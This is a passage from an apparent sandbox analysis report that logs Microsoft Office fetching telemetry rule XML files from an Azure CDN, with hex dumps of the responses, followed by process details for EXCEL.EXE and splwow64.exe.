x-azure-ref: 20241030T024658Z-r197bdfb6b47gqdjvmbpfaf2d000000002qg000000003wy9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:58 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


Session IDSource IPSource PortDestination IPDestination Port
143192.168.2.44989713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:58 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:58 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:58 GMT
Content-Type: text/xml
Content-Length: 1408
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE1038EF2"
x-ms-request-id: b9221649-501e-0064-3dfa-281f54000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024658Z-r197bdfb6b47gqdjvmbpfaf2d000000002n000000000aepy
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:58 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session IDSource IPSource PortDestination IPDestination Port
144192.168.2.44989913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:58 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:58 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:58 GMT
Content-Type: text/xml
Content-Length: 1389
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE0F427E7"
x-ms-request-id: bb32e714-c01e-008d-58b0-262eec000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024658Z-16849878b78q9m8bqvwuva4svc00000005zg0000000095kp
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:58 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


Session IDSource IPSource PortDestination IPDestination Port
145192.168.2.44990013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:58 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:58 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:58 GMT
Content-Type: text/xml
Content-Length: 1352
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDD0A87E5"
x-ms-request-id: 7f9b0e41-501e-0047-71a3-26ce6c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024658Z-16849878b78zqkvcwgr6h55x9n00000006sg00000000ucrs
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:58 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


Session IDSource IPSource PortDestination IPDestination Port
146192.168.2.44990113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:59 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:59 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:59 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDEC600CC"
x-ms-request-id: 2d748408-801e-0048-3eee-25f3fb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024659Z-16849878b78km6fmmkbenhx76n00000006ug000000004h62
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:59 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


Session IDSource IPSource PortDestination IPDestination Port
147192.168.2.44990213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:59 UTC192OUTGET /rules/rule702650v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:59 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:59 GMT
Content-Type: text/xml
Content-Length: 1358
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDEA1B544"
x-ms-request-id: bc808b91-e01e-00aa-0f74-27ceda000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024659Z-17c5cb586f6lxnvg801rcb3n8n000000078g00000000g14x
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:59 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69 61 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
148192.168.2.44990313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:59 UTC192OUTGET /rules/rule703101v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:59 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:59 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE0F93037"
x-ms-request-id: 2073a42b-101e-0065-1a58-274088000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024659Z-16849878b78tg5n42kspfr0x4800000007eg00000000ac5y
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:59 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS"


Session IDSource IPSource PortDestination IPDestination Port
149192.168.2.44990413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:59 UTC192OUTGET /rules/rule703100v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:59 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:59 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:04 GMT
ETag: "0x8DC582BEBCD5699"
x-ms-request-id: 1214394b-301e-000c-0b2b-2a323f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024659Z-r197bdfb6b47gqdjvmbpfaf2d000000002s00000000004tq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:59 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS" S="Medium" /> <F T="2">


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:22:45:36
Start date:29/10/2024
Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:0xef0000
File size:53'161'064 bytes
MD5 hash:4A871771235598812032C822E6F68F19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:6
Start time:22:46:40
Start date:29/10/2024
Path:C:\Windows\splwow64.exe
Wow64 process (32bit):false
Commandline:C:\Windows\splwow64.exe 12288
Imagebase:0x7ff71e180000
File size:163'840 bytes
MD5 hash:77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

No disassembly